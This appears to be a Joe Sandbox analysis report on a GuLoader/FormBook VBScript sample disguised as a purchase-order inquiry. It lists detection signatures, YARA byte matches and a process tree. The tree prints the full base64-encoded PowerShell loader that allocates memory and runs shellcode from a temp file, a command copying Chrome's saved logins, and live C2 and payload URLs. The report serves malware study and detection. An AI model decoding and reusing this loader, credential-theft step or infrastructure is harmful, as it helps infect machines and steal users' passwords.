Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New _Inquiry P.O4622.vbs

Overview

General Information

Sample Name:New _Inquiry P.O4622.vbs
Analysis ID:557838
MD5:24e935f7534a81a7fd4e32daeab208a5
SHA1:251ac05ebc8c963418dccddda127d2a81b5097db
SHA256:5e6d8684c3f71ca6a76d22d1ddc536f302738a3027d22a5b1ce1852c9c551d99
Tags:GuLoadervbs
Infos:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Potential evasive VBS script found (sleep loop)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 5172 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\New _Inquiry P.O4622.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 4676 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAIABSAGgAaQBwADgAIABUAGUAbgBkAGUAcgBlAGUAbwAgAHIAZQBpAG4AaABvAGwAZAAgAEgAagBlAG0AdgBpAHMAZQBsAHUAOQAgAEgAVQBSAFIAUwAgAE8AbQBuAGkANgAgAEIAaQBnAGcAaQBzADUAIABPAGgAbQBhAHYANAAgAEIAdQBjAGgAIABQAGUAZwBnAHkAcABhAHIAYQAgAG4AdgBuAGkAbgBnAGUAZABvACAARgBPAEUATABHAEUAUwBFAEQAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHMAbwB1AG0AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBYAEMATABVAEQAIgAgAA0ACgAkAGIAcgBuAGUAYwB5AGsAbAAzAD0AMAA7AA0ACgAkAGIAcgBuAGUAYwB5AGsAbAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAGIAcgBuAGUAYwB5AGsAbAA4AD0AWwBiAHIAbgBlAGMAeQBrAGwAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABiAHIAbgBlAGMAeQBrAGwAMwAsADAALABbAHIAZQBmAF0AJABiAHIAbgBlAGMAeQBrAGwAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAFMAVQBQAEUAUgAgAFMAVABPAEMASwBJAEwAWQBSACAAUwB0AG4AawBlAGwAYQA1ACAAZQBtAHAAcgBvAHMAdAAgAGQAZQBmAGkAbgBpAHQAdAAgAFMAZQBwAGkAYQBiAHIAdQAxACAAdABvAHAAbwBnAHIAYQBmAGUAcgAgAEQAUgBZAFAAUwBUAEUATgAgAEYAcgBlAGsAdgA2ACAARABlAGwAaQBiAGUANgAgAE0AYQB0AGkAYQBzADMAIABoAHUAcwBuAGkAbgBnAGsAdgAgAEgAdQBzAG0AIABDAEgARQBFAFMARQBGAEwAIAB2AGEAYQBnACAAVABoAGUAbAAgAFMAdQBwAGUAcgA1ACAAcwBhAGMAcgBpAHMAdAAgAFYAZQBkAHMAdABhAGEAIABCAGEAZwB0AHUAbgAgAFAAcgBvAHQAeQBsAHMAMgAgAFMAdAByAHkAZwBlAGsAdgBhADEAIABJAE0ATQBPAEwAQQBUACAAUwB0AGUAZAAgAHMAYwByAGkAIABmAGUAZABlAHYAYQByACAAUABlAHIAaQBvAGQAYQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAcwBuAGEAcgBlAG4AcwAiACAADQAKACQAYgByAG4AZQBjAHkAawBsADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAGIAbAB1AGUAYgAuAGQAYQB0ACIADQAKACMARQB0AHQAaQBuAHoAbwBtAGIAaQA0ACAAaQBuAHQAZQBsAGwAZQBrAHQAIABNAGUAbgBzAHUAcgBhACAAZgByAGkAaABhACAAUwBoAHUAdABpAG4AZwBkAGkAZQAgAFMASwBSAFYAUwBSACAAUwBjAGgAaQBuAGQAeQBsADEAIABzAHkAcgBuAGkAbgBnAGUAIABBAEQATwBQAFQAQQBOAFQAIABMAHUAawBrAGUAdABzAGIAbwAgAGIAbABhAG4AZABpAG4AZwBzAGYAIABEAEUAQwBJAE0ARQBSAEUAIABVAGQAaABvAGwAZABlAGwAaQAgAFMAVABPAEMASwBIAE8AIABHAGUAbQBpACAARgBhAGIAcgBpAGsAYQAyACAAaQBuAHQAZQByAHAAdQBuACAAdgBhAG4AZABzAGsAIABzAHAAaQBsAGQAZQAgAFIARQBHAEkAUwBUAEUAUgAgAFAAbwBzAHQAZwBpAHIAbwBrAG8AMwAgAFIAaQB2AGUAcgBpACAATwBWAEUAUgBFAE0AIABEAEEATgBEAFkAIABUAHIAYQBuAHMAYwAzACAAcABvAGwAeQAgAE0AVQBTAFQAQQBOAEcAUwAgAEsAYQBzAGUAaQBuAGUAdAAgAEoAdQBnAGUAcgBpAG4AZwB0ACAAQgBFAFIATwBMAEkARwBFAEQAIABTAFQAUgBBAFQAIABBAFMARgBBAEwAVAAgAEwAbwBnAGEAcgBpACAADQAKACQAYgByAG4AZQBjAHkAawBsADQAPQBbAGIAcgBuAGUAYwB5AGsAbAAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQAYgByAG4AZQBjAHkAawBsADIALAAyADEANAA3ADQAOAAzADYANAA4ACwAMQAsADAALAAzACwAMQAyADgALAAwACkADQAKACMAQwBIAFIASQBTAFQAIABDAEUAUgBCACAASABpAGcAaABqACAAUgBlAGsAbwBtAG0AYQA4ACAAQwBPAFIARQBDACAATABZAEQASQBHAEgARQBEACAAQQBDAEgATwBMAE8ARQBGACAAbQB1AHMAbABpAG4AZwAgAG0AYQB0AGUAcgBpAGEAbABpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAHUAYQBiAGwAIgAgAA0ACgAkAGIAcgBuAGUAYwB5AGsAbAA1AD0AMAA7AA0ACgAjAFMAdAByAGEAYQBsACAAaAB5AHAAZQByACAATAB1AG4AZQBoAHkAcgBkACAAUgBFAEkARgBJAEsAIAB0AGUAcwB0AGEAbQBlACAAQgBSAEkASwBWAFYATgAgAEkARABJAE8AIABnAHIAYQBkAHUAYQB0ACAATQBlAGEAdABtAGEAbgA1ACAAYwBvAHUAbgB0AGUAcgBlAHYAIABQAHIAZQBpAG4AZABlAGIAdABlADkAIABNAHkAbwBtAGUAcgBlADMAIABPAHAAZQByAGEAdABpAHYAcwB5ACAAcABsAGkAcgBiAGUAcwBrAGEAcgAgAHMAYQBtAGEAcgAgAEwATgBTAEEAVABTACAAYwBoAGUAcwBrACAARgBJAEcAVQBSAFQAWQBQACAAUABvAHUAcwBzAGkANAAgAEYAVQBHAFQARgBKAEUAIABGAHUAbgBrAHQAaQAgAE8AbQBrAHIAcwBlAGwAcwA2ACAAVABvAGEAZABsACAAQQBpAHIAdwBvAHIAdABoACAARwBhAHMAYQBwAHAAYQByAGEAdAAgAEIAdQBnAHMAcAB5AHQAdAA2ACAAUAByAG8AZwByAGEAbQBzAHQANQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgBhAHIAYQBrACIAIAANAAoAWwBiAHIAbgBlAGMAeQBrAGwAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAGIAcgBuAGUAYwB5AGsAbAA0ACwAJABiAHIAbgBlAGMAeQBrAGwAMwAsADIANgAxADEANgAsAFsAcgBlAGYAXQAkAGIAcgBuAGUAYwB5AGsAbAA1ACwAMAApAA0ACgAjAFMAbgBhAGQAZABlAG4AYQBzAG8ANQAgAGMAaQByAGMAdQAgAEMATwBOAEYARQBDACAAcAByAG8AcABvACAAUwB1AGkAdABhAGIAbABlADIAIABQAFMARQBVAEQATwAgAEkATgBEAEwARwBHAEUATAAgAFAAdQB0AHIAZQBzAGMAZQBrAGEAOAAgAFgAeQBsAG8AMwAgAFcASABVAEYARgAgAG8AYQBzAGUAcwBrAGkAbgAgAFQAYQBtAHQAYQBtACAASQBtAHAAbwByADMAIABQAHIAbwB0ACAAVAB5AHIAbwAgAHYAZQBuAHQAcgAgAFUATgBCAEkARABBAEIAIAByAGEAYQB2AGEAcgBlAHIAbgBlACAASABvAHIAYQBoAGwAdQBjAGkAYQAgAFMAeQBuAHQAaABlAHQAIABGAGUAZAB0AGQAIABIAGEAYQByAGQAOQAgAFYASQBOAEsARQBMACAAUwBLAEEAVABUAEUAQQBOAFMAVAAgAE0ARQBDAEgARQBMACAAUgBhAG4AZABpAGEAcABsACAARABFAFQATwBYAEkARgBJACAAQgBsAG4AZABlAG4AIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFQAdQByAGYAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAWQBWAEUAVAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAE0ATQBBAFQASQBEAEkAQQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAG8AbAB1AGkAZABvAGMAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIASwBVAEwAVABVAFIAUwBBAE0ATQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBrAHYAYQBsAGkAdABlAHQAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUwBhAGUAbABnAGUAcwBzAHQAMwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBSAGEAZAByAGUAbgBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFQAZQByAG4AaQBuAGcAdAB5ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGYAcgBtAG4AZABvAHYAZQByACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAbABlAHYAaQBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEQAdQBtAHAAZQBrAGEAOAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBmAGEAcwB0AGcAcgBlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBhAHQAYQBsAGUAcgBlACIAIAANAAoAWwBiAHIAbgBlAGMAeQBrAGwAMQBdADoAOgBDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAVwAoACQAYgByAG4AZQBjAHkAawBsADMALAAgADAALAAwACwAMAAsADAAKQANAAoADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6440 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6080 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • ieinstal.exe (PID: 5480 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.exe (PID: 5288 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
            • cmd.exe (PID: 1584 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.usyeslogistics.com/k6sm/"], "decoy": ["mingshengjewelry.com", "ontimecleaningenterprise.com", "alyssa0.xyz", "ptecex.xyz", "dukfot.online", "pvcpc.com", "iowalawtechnology.com", "nestletranspotation.com", "mysithomes.com", "greenlakespaseattle.com", "evofishingsystems.com", "unilytcs.com", "ordemt.com", "dentalbatonrouge.com", "pictureme360.net", "chalinaslacatalana.com", "newmirrorimage.xyz", "pinklaceandlemonade.com", "rapinantes.com", "yzicpa.com", "josephosman.com", "robsarra.com", "shumgroup.net", "flooringnewhampshire.com", "onceadayman.com", "audiomacklaunch.xyz", "hurryburry.com", "golfvid.info", "tutortenbobemail.com", "tatlitelasorganizasyon.com", "tqgtdd.space", "classicalruns.com", "xx3tgnf.xyz", "galwayartanddesign.com", "qidu.press", "crypto-obmennik.com", "dn360rn001.com", "tridim.tech", "phamhome.com", "mediadollskill.com", "loveatmetaverse.com", "electric4x4parts.com", "azulymargarita.com", "isadoramel.com", "rubyclean.com", "officiallydanellewright.com", "wu8d349s67op.xyz", "detetivepyther.com", "wondubniumgy463.xyz", "registry-finance3.com", "ultracoding.com", "open-4business.com", "supremelt.online", "pangfeng.xyz", "morneview.com", "northfloridapsychic.com", "kg4bppuh.xyz", "friv.asia", "epsilonhomecare.com", "hbina.com", "beachhutprinting.com", "sophoscloudoptix.net", "managemarksol.site", "palestyna24.info"]}
{"Payload URL": "https://owanlab.com/bin_DziiNe252.bin"}
SourceRuleDescriptionAuthorStrings
00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      System Summary

      barindex
      Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5288
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5288
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdA